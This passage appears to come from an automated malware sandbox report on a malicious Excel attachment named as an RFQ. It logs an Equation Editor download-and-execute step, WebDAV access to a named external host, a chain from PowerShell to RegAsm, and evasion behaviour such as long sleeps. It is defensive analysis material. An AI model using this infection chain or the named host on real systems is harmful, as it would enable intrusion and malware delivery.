                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0032F434 push esp; ret 9_2_0032F453
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0032D63A push ecx; ret 9_2_0032D63B
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0032F412 push esp; ret 9_2_0032F413
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00328E08 push edx; ret 9_2_00328E0B
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00325A65 push edx; ret 9_2_00325A6F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0032D642 push ecx; ret 9_2_0032D643
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0032D8B0 push eax; ret 9_2_0032D8D7
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0032FAB6 push edx; ret 9_2_0032FAB7
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_003312BA push ecx; ret 9_2_003312BB
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_003266B8 push edx; ret 9_2_003266BB
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0032CCEB push ecx; ret 9_2_0032CF5F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0032D8D8 push ecx; ret 9_2_0032D917
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_003312C2 push ecx; ret 9_2_003312C3
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_003266C0 push edx; ret 9_2_003266C3
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0032C536 push eax; ret 9_2_0032C537
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0032C53E push eax; ret 9_2_0032C53F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00330B02 push edx; ret 9_2_00330B03
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00330700 push edx; ret 9_2_00330703
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00330708 push edx; ret 9_2_0033070B
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00326176 push eax; ret 9_2_00326177
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0032616E push eax; ret 9_2_0032616F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_003301B6 push eax; ret 9_2_003301B7
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0032F9B8 push ecx; ret 9_2_0032F9BF
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_003301BE push eax; ret 9_2_003301BF
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00331596 push ecx; ret 9_2_00331597
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_003269F7 push ecx; ret 9_2_00326A7B
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0032F9F8 push eax; ret 9_2_0032F9FF
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_00328DD7 push edx; ret 9_2_00328E03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_001F2925 pushfd ; iretd 13_2_001F2929
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_001F5924 push 3C00CD60h; iretd 13_2_001F592D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_001F29F8 pushfd ; iretd 13_2_001F2A11

                Persistence and Installation Behavior

                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: \Device\RdpDr\;:1\zhort.de@SSL\DavWWWRoot
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File dump: sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret[1].doc.0.dr
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File dump: FFA95D3F.doc.4.dr
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Section loaded: netapi32.dll and davhlpr.dll loaded
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0033206F URLDownloadToFileW,ShellExecuteW,ExitProcess,9_2_0033206F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,14_2_0041AA4A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,14_2_0041CB50
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
                Source: RFQ No. 109078906v.xla.xlsx Stream path 'Workbook' entropy: 7.99934649635 (max. 8.0)
                Source: 9EC30000.0.dr Stream path 'Workbook' entropy: 7.99925312434 (max. 8.0)
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

                Malware Analysis System Evasion

                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0040F7A7 Sleep,ExitProcess,14_2_0040F7A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,14_2_0041A748
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000
                Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 790
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2032
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1055
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5687
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_14-53394
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3992 Thread sleep time: -300000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2832 Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3120 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2756 Thread sleep count: 1055 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2756 Thread sleep count: 5687 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1908 Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1888 Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1888 Thread sleep time: -1800000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1888 Thread sleep time: -600000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2896 Thread sleep time: -33000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1960 Thread sleep time: -120000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1956 Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Last function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_00409253
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,14_2_0041C291
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,14_2_0040C34D
